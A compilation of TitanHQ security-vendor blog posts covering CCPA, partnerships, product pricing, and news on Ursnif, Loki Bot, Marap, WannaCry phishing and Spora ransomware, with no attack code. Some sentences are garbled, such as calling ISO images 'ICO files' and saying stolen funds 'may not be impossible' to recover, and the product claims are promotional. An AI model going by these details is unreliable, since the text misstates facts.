CCPA does not go as far as GDPR in terms of data security requirements for businesses. CCPA does not stipulate the security measures that must be implemented to protect consumer data, but it does require businesses to have adequate protections in place to safeguard consumer data, including measures to prevent unauthorized data access. Bear in mind that penalties can be imposed for data breaches and consumers can take legal action over the exposure of their data if the company holding that data has been negligent. Consumer lawsuits can require payment of up to $750 per consumer in the event of a CCPA violation and it is not necessary to provide proof of harm. A large data breach could therefore prove very costly.
How TitanHQ Can Help with CCPA Compliance
TitanHQ offers three solutions that can help with CCPA compliance. SpamTitan Email Security, WebTitan DNS Filtering, and ArcTitan Email Archiving.
SpamTitan is a powerful email security solution that provides industry leading protection against spam and the leading causes of data breaches – phishing attacks and malware infections.
WebTitan is a DNS filtering solution that provides an additional level of protection against phishing attacks and malware. WebTitan blocks attempts by network users to access malicious websites such as those used for phishing or malware delivery, thus helping to prevent the exposure of consumer data.
ArcTitan is an email archiving solution that helps businesses keep email data protected, meet email retention requirements, and quickly find and recover emails when dealing with customer complaints, demonstrating compliance, and for finding and deleting the data of consumers if a request to have data deleted is received.
TitanHQ and Pax8 have formed a new strategic partnership that has seen TitanHQ’s cloud-based email security and web security solutions added to the Pax8 ecosystem and offered to managed service provider partners.
Pax8 is a leading cloud distributor, providing 100% cloud-based productivity, infrastructure, continuity, and security solutions to its partners. The company is a born in the cloud distributor connecting the channel ecosystem to its award-winning transactional cloud marketplace.
Pax8 is a regular recipient of industry awards and has been named as CRN’s Coolest Cloud Vendor, Best in Show at NextGen for two years in a row, as well as having collected two consecutive Best in Show awards at XChange conferences. Pax8 is also enjoying impressive growth, having risen from position 68 in the Inc. 5000 list of the fastest growing companies in 2018 to position 60 in 2019.
The successes are due to the ease at which its partners can find, purchase, and manage cloud solutions and get the most out of their cloud journeys. One of the key areas driving growth in the cloud is cybersecurity. Through Pax8, MSPs can easily find, deploy, and manage cloud-based cybersecurity solutions to protect their own networks and those of their clients.
Pax8 offers cybersecurity solutions to protect the entire attack surface but the partnership with TitanHQ allows Pax8 to better serve MSPs serving the SMB market. Pax8 carefully vets the vendors it works with and only selects companies that have developed powerful, channel-friendly solutions. TitanHQ was therefore a natural fit, being the leading provider of cloud-based email and web security solutions to MSPs serving the SMB market.
TitanHQ has developed its cybersecurity solutions to meet the needs of managed service providers and gives them the features and benefits that are often lacking in many SMB-focused security products. TitanHQ’s email and web security offerings can be hosted within an MSPs own environment and they can be supplied in white-label form ready for MSP branding. MSPs benefit from highly competitive pricing, a fully transparent pricing policy, easy integration into their existing systems through TitanHQ APIs, no minimum users or monthly targets, generous margins, and industry-leading technical support. SpamTitan Email Security and WebTitan DNS filtering are also easy to implement and use and have a low management overhead.
For these reasons the solutions are much loved by end users and consistently achieve high ratings on software review sites such as G2 Crowd Report, Gartner Peer Insights, and Capterra.
“Our partners are excited about the addition of TitanHQ and the ability to protect their clients’ businesses by blocking malware, phishing, ransomware, and links to malicious websites from emails.” said Ryan Walsh, chief channel officer at Pax8.
“I am delighted to partner with the Pax8 team,” said TitanHQ CEO Ronan Kavanagh. “Their focus and dedication to the MSP community is completely aligned with ours at TitanHQ, and we look forward to delivering our integrated solutions to their partners and customers.”
A new strain of the Ursnif banking Trojan has been identified and the actors to blame for the latest campaign have implemented a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most often witnessed Trojans. As is the case with other banking Trojans, the purpose of the Ursnif Trojan is to take away credentials such as logins to banking websites, corporate bank details, and credit card information. The stolen credentials are then used to complete financial transactions. It is not unusual for accounts to be drained prior to the transactions being discovered, by which time the funds have cleared, have been withdrawn, and the criminal’s account has been closed. Recovering the stolen funds may not be impossible.
Infection will result in the malware stealing a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also captures screenshots of the infected device and logs keystrokes. All of that information is silently shared to the hacker’s C2 server.
Banking Trojans can be put in place in a number of ways. They are often installed onto websites where they are downloaded in drive-by attacks. Traffic is sent d to the malicious websites using malvertising campaigns or spam emails contacting hyperlinks. Legitimate websites are compromised using brute force methods, and kits installed on the sites that attack people who have failed to keep their software up to date. In a lot of, software is shared using spam email, hidden in attachments.
Spam email has previously been used to share the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method they are far more widespread.
Infection will see the user’s contact list scanned and spear phishing emails sent to each of the user’s contacts. Since the spear phishing emails come from a trusted email account, the chances of the emails being opened is significantly heightened. Simply opening the email will not lead to infection. For that to take place, the recipient must click on the email attachment. Again, since it has come from a trusted person, that is more probably.
The actors to blame for this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is sent. The spear phishing emails contain message threads from past communications. The email looks like a response to a previous email, and include details of past communications.
A short line of text is included as a attempt to get the recipient to open the email attachment – a Word document including a malicious macro. That macro needs to be authorized to run – if macros have not been set to run automatically, but it will not until the Word document is shut. When the macro is enabled, it initiates PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim’s contacts.
This is not an original tactic, but it is new to Ursnif – and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of additional tactics to hamper detection, allowing information to be stolen and bank accounts emptied before infection is discovered – the Trojan even erases itself once it has run.
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter like SpamTitan, malicious emails can be blocked to prevent them from reaching end user’s inboxes, greatly reducing the danger posed by malware infections.
In the rush to buy Christmas gifts online, security awareness often is disregarded and hackers are waiting to take advantage. Hidden among the countless emails sent by retailers to inform past customers of the most recent special offers and deals are a great many holiday season email scams. To an unskilled eye, these scam emails seem to be no different from those sent by authentic retailers. Then there are the phishing websites that record details and credit card numbers and websites hosting exploit kits that silently install malware. It is a dangerous time to be using the Internet for shopping.
However if you are careful, you can avoid holiday season email scams, phishing websites, and malware this Christmas. To help you avoid strife, we have gathered some tips to avoid holiday season email scams, phishing websites and malware this festive season.
Guidelines to Stay Safe This Holiday Season
In the days before Christmas there will be scams aplenty. To stay safe online, remember the following:
Carefully check the URL of websites before parting with your card details every time
Spoofed websites often look just like like the genuine sites that they mimic. They use the same background and style, the same imagery, and the same branding as retail sites. The only thing not the same is the URL. Before filling in your card details or parting with any sensitive data, review the URL of the site and make sure you are not on a spoofed website.
Never permit retailers to hold your card details for future transactions
It is a service that makes for swift purchases. Sure, it is a pain to have to enter your card details each time you want to buy something, but by taking an extra minute to enter your card details each time you will reduce the chance of your account being emptied by scammers. Cyberattacks on retailers are common, and SQL injection attacks can give hackers access to retailer’s websites – and a treasure trove of stored credit card numbers.
Crazy deals are normally just that
You may find out that you have won a PlayStation 4 or the latest iPhone in a competition. While it is possible that you may have won a prize, it doubtful that this will happen if you haven’t actually entered a prize draw. Similarly, if you are offered a 50% discount on a purchase through email, there is a high probability that is a scam. Scammers take advantage of the fact that everyone loves a deal, and never more so than during holiday period.
If you purchase online, use your credit card
Avoid the holiday season crowds and buy presents online, but use your credit card for purchases instead of a debit card. If you have been captured in a holiday season scam or your debit card details are stolen from a retailer, it is highly unlikely that you be able to recuperate stolen funds. With a credit card, you have better security measures and getting a refund is much more likely.
never Visit HTTP sites
Websites secured by the SSL protocol are safer. If a website address begins with HTTPS it means the connection between your browser and the website is encrypted. It makes it much more difficult for sensitive data to be intercepted. Never hand over your credit card details on a website that does not begin with HTTPS.
Carefully Check of order and delivery confirmations
If you order over the Internet, you will no doubt want to look over the status of your order and find out when your purchases will be delivered. If you your sent an email with tracking information or a delivery confirmation, treat the email as potentially dangerous. Always go to the delivery company’s website by entering in the URL into your browser, rather than visiting links sent through email. Fake delivery confirmations and parcel tracking links are common. The links can bring you to phishing websites and sites that install malware, while email attachments often contain malware and ransomware installers.
Holiday season is a hectic, but be careful online
One of the chief factor in holiday season being successful for email scams is because people are in a hurry and do not take the time to read emails carefully and check attachments and links are authentic. Scammers take advantage of busy individuals. Look over the destination URL of any email link before you click. Take time to consider things prior to taking any action online or respond to an email request.
Have different passwords for different websites
You may decide to purchase all of your Christmas gifts on Amazon, but if you need to sign up[ for a number of different multiple sites, never sue the same password for these websites. Password reuse is one of the main ways that hackers can capture access details for your social media networks and bank accounts. If there is a data breach at one retailer and your password is taken illegally, hackers will attempt to use that password on lots of other platforms.
Holiday season gift card scams are very common, and this year is no exception. Many gift card-themed scams were tracked during Thanksgiving weekend that offered free or cheap gift cards to lure online shoppers into sharing publicly their credit card information.
Everyone is a fan of a bargain and the offer of something for nothing may be too tempting. Many people are taken in by these scams which is why threat actors switch to gift card scams around Holiday season.
Consumers can be tricked into parting with credit card information, but companies are also at risk. Many of these campaigns are designed to obtain access to login credentials or are used to install malware. If an end user responds to such a scam during their work day, it is their employer that will likely pay the ultimate price.
This year has seen many businesses hit by gift card scam campaigns. Figures released by Proofpoint indicate that out of the organizations that have been targeted with email fraud attacks, almost 16% had experienced a gif card-themed attack: Up from 11% in Q2, 2018.
This year has also seen a heightened risk due to business email compromise (BEC) style tactics, with emails appearing to have been shared from within a company. The emsay that they have been sent from the CEO (or another executive) requesting accounts and administration staff purchase gift cards for clients or ask for gift cards be bought in order to use them for charitable donations.
To cut the risk from gift card scams and other holiday-themed phishing emails, firms need to see to it that they have powerful spam filtering technology in place to block the emails at source and prevent them from being sent to employee inboxes.
Advanced Anti-Phishing Security for Office 365
Many companies use Office 365, but even Microsoft’s anti-phishing security measure see many phishing emails slip through the security systems, especially at businesses that included the advanced phishing protection subscription. Even with the advanced anti-phishing measures, emails still make it past Microsoft’s filters.
If you wish to block these malicious messages, an advanced third-party spam filter is necessary. SpamTitan has been designed to work side by side with Office 365 to improved protection against malware, phishing emails, and more complex phishing attacks.
SpamTitan can deal with more than 99.9% of spam email, while dual antivirus engines prevent 100% of known malware. What really sets SpamTitan apart from other software is the level of protection it offers against new threats. A combination of Bayesian analysis, greylisting, machine learning, and heuristics help to identify zero-day attacks, which often get by Office 365 defenses.
If you want to enhance security from email-based attacks and reduce the amount of spam and malicious messages that are arriving in Office 365 inboxes, contact TitanHQ and book a product demonstration to see SpamTitan working.
There is a cheaper option that Cisco OpenDNS that provides total protection against web-based threats. If you are currently using OpenDNS or have yet to configure a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity solutions can be implemented to secure the network perimeter, but employees often are careless online that can lead to costly data breaches. The online activities of employees can easily lead to in malware, ransomware, and viruses being installed. Staff may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login details.
Addressing malware infections, solving ransomware attacks, and resolving phishing-related breaches have a negative impact on the business and the resultant data breaches can be incredibly expensive. Due to this, the threat from web-based attacks cannot be disregarded.
Luckily, there is an easy solution that offers protection against web-based threats by carefully managing the web content that their employees can access: A DNS-based web filter.
DNS-based web filtering requires no hardware acquisitions and no software installations. Within around 5 minutes, a business will be able to control employee internet access and block web-based dangers. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be conducting a joint webinar to introduce an alternative to Cisco OpenDNS – The WebTitan-powered solution, Celestix WebFilter Cloud.
Celestix will be implemented by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer, Derek Higgins who will outline how the DNS-based filtering technology offers total protection from web-based dangers at a fraction of the cost of OpenDNS.
The webinar is at 10:00 AM US Pacific Time on Wednesday December 5, 2018.
Version 7.06 of SpamTitan was released on November 12, 2019. The latest version includes several important security updates to address known issues with the reporting engine. The security patches and ISO/OVA images can now be downloaded and have been made available for several packages including OpenSSH, OpenSSL, Sudo, PHP, and ClamAV.
The update has been released for both the cloud-based anti-spam service, which has already been updated for all users, and TitanHQ’s SpamTitan software solution, SpamTitan Gateway. Software users have had the new release downloaded onto their appliances but administrators will need to login to their UI to apply the update and security patches.
The latest release is accompanied by a new RESTapi, which is one of the most important enhancements in SpamTitan v7.06. The RESTapi has been released to make it easier for clients and partners to implement integrations.
“Implementing the RESTapi and encouraging API adoption are vital steps in our partnership expansion plans,” said TitanHQ CEO, Ronan Kavanagh. “After experiencing 30% growth in 2019, TitanHQ expects these product enhancements and new features to make 2020 another record-breaking year.”
Users should not experience any problems upgrading to the latest SpamTitan version, but if any issues are experienced or for advice on upgrading, contact the customer service team on email@example.com. Technical specifications of the new REStapi can be found on this link.
In this post we propose an ideal Cisco Umbrella alternative that you can implement at a fraction of the cost of Cisco Umbrella, yet still have excellent protection from web-based threats and precision internet content control for your workforce.
WebTitan Cloud is the leading Cisco Umbrella alternative for SMBs and Managed Service Providers (MSP) that serve the SMB market. WebTitan Cloud is, in many respects, a direct swap out for Cisco Umbrella, and one that will save you a small fortune on DNS filtering costs.
Before we cover the cost of WebTitan versus Cisco Umbrella, it is worthwhile taking a moment to explain why DNS filtering is now an essential part of the security stack and why you need to add this additional layer of security if you are not already using a DNS filter.
Why is a DNS Filter Necessary?
You will no doubt be aware that the internet can be a dangerous place. As an IT professional or SMB owner, you need to make sure that your employees do not venture into areas of the internet that could cause your business harm.
Even general web browsing can pose a risk of a malware infection or ransomware download, and employees can easily be tricked into visiting phishing web pages where credentials are harvested. These are very real threats that need to be mitigated.
Rather than leave things to chance and hope your employees obey the rules and recognize all threats in time, you can implement a content filtering solution such as a DNS filter. A DNS filter requires no hardware purchases nor software downloads. You just reconfigure your DNS and point it to the provider of your DNS filtering service and apply your content controls.
All content filtering takes place in the cloud, there will be no latency, and filtering will take place without any content being downloaded. You can control the categories of content that can be accessed and, if rules are broken by employees, they will be directed to a block page and no harm will be done. You can run reports on web usage, apply controls to conserve bandwidth, and perhaps most importantly, you can prevent employees from visiting malicious websites and can block malware and ransomware downloads. Without this additional security layer, your business will be at risk.
Is It Worth Paying the Cisco Umbrella Price?
We are not going to try to convince you not to look at Cisco Umbrella, as it is an accomplished DNS filtering solution that is suitable for many enterprises and SMBs. The product will certainly protect your business from web-based threats and will allow you to enforce your internet policies. However, there is a but. If you are already using Cisco Umbrella or have made enquiries about the solution, you will be aware that the product comes at a considerable cost.
Cisco Umbrella is not a one-size fits all solution. Cisco caters to a range of different customers, from small businesses to large enterprises and packages have been devised accordingly. The most basic offering is DNS Security Essentials, which is a bare bones DNS filtering package that blocks malware and ransomware downloads and allows you to enforce your internet policies. However, there are many important features lacking that most SMBs will feel are important. For instance, now that most websites have moved over to HTTPS, connections to those sites are encrypted. You therefore need to decrypt, inspect, and then re-encrypt that traffic. The basic package dos not include this feature. Decryption and inspection of all SSL traffic is only available in the top-level package.
DNS Security Advantage is the second package offered, which provides more features such as greater insight for investigations, file threat intelligence, and some other tools. At the top end is the comprehensive Secure Internet Gateway Essentials package, which offers enterprise-grade DNS filtering with a host of features required by enterprises with a huge workforce. For most SMBs, the top package will offer a host of features that will most likely not be used. Unfortunately, the lowest level package is missing some important features that really are required by many SMBs.
What is the Cisco Umbrella Cost Per User?
So, how much does Cisco Umbrella cost? This is a key consideration for SMBs as they are likely to have limited budgets. They need to pay for several layers of cybersecurity to block the threats they are most likely to encounter. Spend top dollar on one solution and it is likely to mean less can be spent on other important security controls.
At the standard level, the Cisco Umbrella cost per user is $2.20 per month, which is considerably more than Cisco Umbrella alternative options such as WebTitan. For 100 users, Cisco Umbrella will cost $2,640 per year and that price does not include support, which Cisco considers an optional extra. If you opt for one of the more advanced packages, that price will increase considerably.
The standard price for a Cisco Umbrella alternative is around $1.00 to $1.50 per user per month, but here at TitanHQ we have a highly competitive pricing policy and can provide you with a Cisco Umbrella alternative for just $0.90 per user per month. That will save you $1,560 per year, based on 100 users.
There is More to Consider than the Cost of Cisco Umbrella Alone
Cost is not the only consideration, although it is certainly important. You will want to ensure that your DNS filter allows you to control content easily and it must provide protection against web-based threats. So, does opting for a Cisco Umbrella alternative reduce the protection you will get? Actually, you can pay less and improve protection, have an easier to use product, with better reporting, and less complexity.
At TitanHQ we have a totally transparent and flexible pricing policy and provide the same, high level of protection for everyone. All customers benefit from full SSL filtering to ensure that HTTPS traffic is inspected and analyzed, and all customers get industry-leading customer support at no extra cost.
WebTitan is also loved by users who rate it highly for ease of setup, ease of use, ease of admin, and for the quality of support provided. This can be seen on review sites such as G2 Crowd, as detailed below.
The Leading DNS Filtering Solution for MSPs Serving the SMB Market
TitanHQ is the global leader in cloud-based email and web security solutions for the MSP that services the SMB market. WebTitan has been designed to be ideal for MSPs and includes a host of features not offered by Cisco. In contrast to all packages of Cisco Umbrella, we offer a range of hosting options. You can even host in your own environment, something that is important for many MSPs. You can also have WebTitan in white label form, ready to take your own branding, another big plus for MSPs. The solution is also easy to integrate seamlessly into your own environment thanks to a suite of APIs.
Find out More About Our Cisco Umbrella Alternative Today!
Our sales staff will be happy to explain the benefits of WebTitan over Cisco Umbrella and schedule a product demonstration to show you how easy the solution is to use and integrate into your own environment. If you would like to try WebTitan before committing, you can also take advantage of our free 14-day trial. For more information, give the TitanHQ team a call today.
Microsoft has addressed 27 critical flaws this Patch Tuesday, including a Microsoft .Net Framework flaw that is being actively exploited to download Finspy surveillance software on devices running Windows 10.
Finspy is genuine software created by the UK-based Gamma Group, which is used by governments globally for cyber-surveillance. The software has been downloaded in at least two attacks in the past few months according to FireEye experts, the most recent attack leveraged the Microsoft .Net Framework flaw.
The attack begins with a spam email including a malicious RTF file. The document uses the CVE-2017-8759 vulnerability to create arbitrary code, which installs and executes a VB script including PowerShell commands, which in turn installs the malicious payload, which includes Finspy.
FireEye suggests at least one attack was completed by a nation-state against a Russian target; however, FireEye experts also believe other actors may also be using the vulnerability to conduct attacks.
According to a blog post last Tuesday, the Microsoft .Net Framework flaw has been detected and mitigated. Microsoft strongly recommends downloading the latest update promptly to minimize exposure. Microsoft says the flaw could permit a malicious actor to take full control of an impacted system.
Many Several Bluetooth flaws were discovered and shared on Tuesday by security company Aramis. The flaws impact billions of Bluetooth-enabled devices around the globe. The eight flaws, referred to as BlueBorne, could be used to carry out man-in-the-middle attacks on devices via Bluetooth, sending traffic to the attacker’s computer. The bugs exist in Windows, iOS, Android and Linux.
In order to target the flaws, Bluetooth would need to be turned for the targeted device, although it would not be necessary for the device to be in discoverable mode. A hacker could use the flaws to connect to a device – a TV or speaker for example – and start a connection to a computer without the user’s knowledge. In order to carry out the attack, it would be necessary to be in relatively close physically to the targeted device.
In addition to intercepting communications, a hacker could also take full management of a device and steal data, download ransomware or malware, or perform other malicious activities such as placing the device on a botnet. Microsoft addressed one of the Bluetooth driver spoofing bugs – CVE-2017-8628 – in the latest round of updates.
One of the most pressing updates is for a remote code execution vulnerability in NetBIOS (CVE-2017-0161). The vulnerability impacts both servers and work devices. While the vulnerability is not thought to be currently exploited in the wild, it is of note as it can be exploited just by sending specially crafted NetBT Session Service packets.
The Zero Day Initiative (ZDI) said the flaw “is practically wormable within a Local Area Network. This could also target many virtual clients if the guest OSes all connect to the same (virtual) LAN.”
Overall, 81 updates have been published by Microsoft this Patch Tuesday. Adobe has addressed eight flaws, including two critical memory corruption bugs (CVE-2017-11281, CVE-2017-11282) in Flash Player, a critical XML parsing flaw in ColdFusion (CVE-2017-11286) and two ColdFusion remote code execution flaws (CVE-2017-11283, CVE-2017-11284) relating to deserialization of untrusted data.
In the United States, healthcare industry phishing campaigns have been to blame for exposing the protected health records of well in excess of 90 million Americans over the course of the past year. That’s more than 28% of the population of the United States.
This week, another case of healthcare sector phishing has come to light following the announcement of Connecticut’s Middlesex Hospital data breach. The hospital saw that four of its employees responded to a phishing email, resulting in their email account login details being sent to a hacker’s command and control center. In this case the damage inflicted by the phishing attack was limited, and only 946 patients had their data exposed. Other healthcare groups have not been nearly so fortunate.
Our industry news section includes a wide range of news items of particular relevance to the cybersecurity sector and managed service providers (MSPs).
This section also sources details of the most recent white papers and research studies relating to malware, ransomware, phishing and data breaches. These articles allow some insight into the general state of cybersecurity, the industries currently most heavily aimed for by cybercriminals, and figures and statistics for your own reports.
Cybercriminals use massive spam campaigns designed to infect as many computers as they can. These attacks are random, using email addresses stolen in large data breaches such as the cyberattacks on LinkedIn, MySpace, Twitter and Yahoo. However, highly targeted attacks are on the up, with campaigns geared to specific sectors. These industry-specific cyberattacks and spam and malware campaigns are covered in this section, along with possible mitigations for reducing the danger of a successful attack.
This category is therefore important for organizations in the education, healthcare, and financial services sectors – the most common attacked industries according to the latest security reports.
The articles cover current campaigns, spam email identifiers and details of the social engineering tactics used to trick end users and gain access to corporate networks. By using the advice in these articles, it may be possible to stop similar attacks.
This network security news section contains a variety of articles about safeguarding networks and blocking cyberattacks, ransomware and malware installations. This section also includes articles on recent network security breaches, alerting outfits to the latest attack trends being used by hackers.
Layered cybersecurity defenses are vital due to the increase in hacking incidents and the explosion in ransomware and malware variants over the past 24 months. Outfits can address the threat by investing in new security defenses such as next generation firewalls, end point defense systems, web filtering solutions and advanced anti-malware and antivirus defenses.
While much investment goes on proven solutions that have been highly resilient in the past, many cybersecurity solutions – antivirus software – are not as effective as they were previously. In order to keep pace with hackers and cybercriminals and get ahead of the curve, organizations should consider using a wide variety of new cybersecurity solutions to block network intrusions, stop data breaches and improve protection against the most recent malware and ransomware threats.
This category includes information and guidance on different network security solutions that can be adopted to enhance e network security and ensure networks are not focused on by hackers and infected with malicious software.
The TitanHQ team is on the road once again this fall and will be attending some of the biggest and best Managed Service Provider (MSP) conferences and roadshows in Europe and the United States.
The fall schedule of trade shows got underway in Chicago at the Taylor Business Group BIG Conference, followed by Cloudsec2019 in London. September also sees the team attend Datto Dublin on September 17 and the MSH Summit in London on September 18.
If you have not already booked up to attend these events, there will be plenty more opportunities to meet with the TitanHQ team to talk about email security, web security, and email archiving this fall.
TitanHQ will be attending the following MSP-focused events in September, October, and November:
September 17, 2019
September 18, 2019
October 6-10, 2019
October 7-8, 2019
CompTIA EMEA Show
October 16-17, 2019
Canalys Cybersecurity Forum
October 21-23, 2019
October 30, 2019
MSH Summit North
October 30, 2019
IT Nation Evolve (HTG 4)
October 30, 2019
IT Nation Connect
November 5-7, 2019
The above events give MSPs, ISPs, and VARs the opportunity to meet with the TitanHQ team to discuss the full range of MSP-focused cybersecurity solutions, arrange a product demonstration to see the solutions in action, and discover how to integrate the solutions into your client management systems.
TitanHQ first started developing cybersecurity solutions for SMBs in 1999. While many cybersecurity firms have recently started offering their solutions to MSPs, TitanHQ saw the need to do things a little differently and ensured MSPs were considered from the very start.
TitanHQ has developed a suite of cybersecurity solutions that incorporate all the features demanded by MSPs. With TitanHQ solutions, MSPs can not only meet the needs of their customers and greatly improve their security postures, the solutions save MSPs money by reducing the amount of time they have to spend fighting fires and resolving malware infections and remediating responses to phishing emails. Less time on support and engineering allows MSPs to channel their resources into generating more profit.
The roadshows, conferences, trade shows, and other MSP-focused events give prospective MSP clients the opportunity to quiz TitanHQ about its products and discover how easily the solutions can be incorporated into MSPs technology stacks and rolled out to customers.
If you have not heard of TitanHQ, have yet to incorporate SpamTitan, WebTitan, or ArctTirtan into your service stack, or have unanswered questions about spam filtering, web filtering, and email archiving in the cloud, the TitanHQ team is here to help.
If you do not feel that you can find the time to attend one of the above events, contact the TitanHQ team by phone or email to book a product demonstration, get your questions answered, and sign up for a free trial of any or all of TitanHQ’s email security, web security, and email archiving solutions for MSPs.
If you are attending an event, be sure to pay TitanHQ a visit and feel free to contact TitanHQ in advance of the conference to book an appointment or to get answers to your questions:
Rocco Donnino, Executive Vice President-Strategic Alliances, LinkedIn
Eddie Monaghan, MSP Alliance Manager, LinkedIn
Marc Ludden, MSP Alliance Manager, LinkedIn
Dryden Geary, Marketing Director
A spam email campaign is being conducted focusing on targeting corporate email accounts to share Loki Bot malware. Loki Bot malware is a data stealer capable of obtaining passwords stored in browsers, obtaining email account passwords, FTP client logins, cryptocurrency wallet passwords, and passwords in placed for messaging apps.
Along with stealing saved passwords, Loki Bot malware has keylogging capabilities and is possibly capable of installing and running executable files. All data captured by the malware is transferred to the hacker’s C2 server.
Kaspersky Lab researchers identified an increase in email spam activity focusing on corporate email accounts, with the campaign discovered to be used to spread Loki Bot malware. The malware was sent hidden in a malicious email attachment.
The intercepted emails included an ICO file attachment. ICO files are duplicates of optical discs, which are usually mounted in a virtual CD/DVD drive to open. While specialist software can be used to open these files, the majority of modern operating systems have the ability to access the contents of the files without the need for any extra software.
In this instance, the ICO file includes Loki Bot malware and double clicking on the file will result in a downloading of the malware on operating systems that support the files (Vista and later).
It is relatively unusual for ICO files to be used to deliver malware, although not unheard of. The unfamiliarity with ICO files for malware delivery may see end users try to open the files.
The campaign included a wide variety of lures including fake purchase orders, speculative enquiries from companies including product lists, fake invoices, bank transfer details, payment requests, credit alerts and payment confirmations. Well-known businesses such as Merrill Lynch, Bank of America, and DHL were spoofed in some of the emails.
A different and unrelated spam email campaign has been discovered that is using IQY files to deliver a new form of malware known as Marap. Marap malware is a installer capable of downloading a variety of different payloads and additional modules.
During installation, the malware fingerprints the system and gathers data such as username, domain name, IP address, hostname, language, country, Windows version, details of Microsoft .ost files, and any anti-virus solutions detected on the infected computer. What happens next depends on the system on which it is downloads. If the system is of particular interest, it is earmarked for a more thorough extensive compromise.
Four separate campaigns involving millions of messages were discovered by experts at Proofpoint. One campaign included an IQY file as an attachment, one included an IQY file within a zip file and a third used an embedded IQY file in a PDF file. The fourth used a Microsoft Word document including a malicious macro. The campaigns seem to be targeting financial institutions.
IQY files are used by Excel to download web content straight into spreadsheets. They have been used in many spam email campaigns in recent weeks to install a range of different malware variants. The file type is proving popular with cybercriminals because many anti-spam solutions fail to recognize the files as malicious.
Since most end users would not have any need to open ICO or IQY files, these file types should be placed on the list of blocked file types in email spam filters to prevent them from being shared to end users’ inboxes.
hackers are using WannaCry phishing emails to conduct campaigns using the fear surrounding the global network worm attacks.
An email campaign has been discovered in the United Kingdom, with BT customers being focused on. The hackers have been able to spoof BT domains and made their WannaCry phishing emails look very realistic. BT branding is used, the emails are well composed and they claim to have been shared from Libby Barr, Managing Director, Customer Care at BT. A quick review of her name on Google will reveal she is who she claims to be. The WannaCry phishing emails are realistic, cleverly put together, and are likely to trick many customers.
The emails claim that BT is working on enhancing its security after the massive ransomware campaign that impacted over 300,000 computers in 150 countries on May 12, 2017. In the UK, 20% of NHS Trusts were impacted by the incident and had data encrypted and services majorly damaged by the ransomware attacks. It would be extremely hard if you live in the UK to have avoided the news of the attacks and the extent of the damage they have inflicted.
The WannaCry phishing emails provide a very good reason for taking quick action. BT is offering a security upgrade to stop its customers from being harmed by the attacks. The emails claim that in order to keep customers’ sensitive data secure, access to certain features have been turned off on BT accounts. Customers are told that to restore their full BT account functionality they need to confirm the security upgrade by selecting the upgrade box contained in the email.
Of course, visiting the link will not lead to a security upgrade being applied. Customers are required to share their login credentials to the hackers.
Other WannaCry phishing emails are likely to be issued claiming to be originating from other broadband service providers. Similar campaigns could be used to quietly install malware or ransomware.
Hackers often take advantage of global news events that are garnering a lot of media interest. During the Olympics there were many Olympic themed spam emails. Phishing emails were also prevalent during the U.S. presidential elections, the World Cup, the Zika Virus epidemic, and following every major news stories.
it is vital never to click on links sent in email from people you do not know, be extremely careful about visiting links sent from people you do know, and assume that any email you receive could be a phishing email or other malicious message.
Just one phishing email sent to a member of staff can lead to a data breach, email or network compromise. It is therefore crucial for employers to be careful. Employees should be provided with phishing awareness training and taught the giveaway signs that emails are not authentic. It is also vital that an advanced spam filtering solution is employed to stop most phishing emails from landing in end users inboxes.
In relation to that, TitanHQ is here to help you out. get in touch with the team now to see how SpamTitan can protect your business from phishing, malware and ransomware campaigns.
A new and very dangerous ransomware threat to deal called Spore has been discovered.
Locky and Samas ransomware have certainly been major headaches for IT departments. Both forms of ransomware have a host of smart features designed to prevent detection, grow infections, and inflict the most damage possible, leaving companies with little option but pay the ransom demand.
However, there is now a new ransomware threat to address, and it could well be even bigger than Locky and Samas. Luckily, the ransomware authors only seem to be targeting Russian users, but that is likely to change. While a Russian version has been used in hacking attacks so far, an English language version has now been created. Spora ransomware attacks will soon be a global issue.
A massive portion of time and effort has gone into producing this very dangerous new ransomware variant and a decryptor is unlikely to be created due to the way that the ransomware encrypts data.
As opposed to many new ransomware attacks that rely on a Command and Control server to receive instructions, Spora ransomware can encrypt files even if the user is offline. Closing down Internet access will not stop an infection. It is also not possible to restrict access to the C&C server to prevent infection.
Earlier Ransomware variants have been created that can encrypt without C&C communication, although unique decryption keys are not necessary. That means one key will unlock all infections. Spora ransomware on the other hand needs all victims to use a unique key to unlock the encryption. A hard-coded RSA public key is used to create a unique AES key for every user. That process happens locally. The AES key is then used to encrypt the private key from a public/private RSA key pair set up with each victim, without C&C communications. The RSA key also encrypts the separate AES keys for each user. Without the key supplied by the hackers, you cannot unlock the encryption.
This complex encryption process only represents part of what makes Spora ransomware unique. Different to many other ransomware variants, the hackers have not set the ransom amount. This gives the hackers a degree of flexibility and importantly this process occurs automatically. Security experts believe the degree of automation will see the ransomware provided on an affiliate model.
The flexibility allows companies to be charged a different amount to a person. The ransom set is calculated based on the extent of the infection and types of files that have been encrypted. Since Spora ransomware gathers data on the user, when contact is made to pay the ransom, amounts could easily be changed.
When victims visit the hacker’s payment portal to pay the ransom, they must supply the key file that is set up by the ransomware. The key files contains a range of data on the user, including details of the campaign used. The hackers can therefore carefully monitor infections and campaigns. Those campaigns that are successful and result in more payments can then be repeated. Less effective campaigns can be brought to an end.
At present there are a number of different payment options, including something quite different. Victims can pay to unlock the encryption, or pay extra to avoid future attacks, essentially being given immunity.
